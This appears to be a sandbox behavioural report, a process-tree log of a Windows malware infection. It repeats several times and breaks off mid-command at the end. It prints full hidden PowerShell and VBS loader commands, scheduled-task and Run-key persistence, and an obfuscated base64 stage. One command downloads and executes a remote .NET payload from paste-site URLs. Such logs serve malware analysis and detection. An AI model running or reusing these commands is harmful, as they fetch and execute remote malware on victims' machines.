        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:5108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:2208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:4628
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:2416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:1600
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:5440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:2772
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:2428
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:2804
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3540
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        
        PID:5272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:2296
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:6048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:5484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:2216
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:2420
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:3988
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:5636
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4976
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:5132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:1556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:2844
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:3344
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:6132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:656
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:3992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:1432
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:2228
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:5156
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2156
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 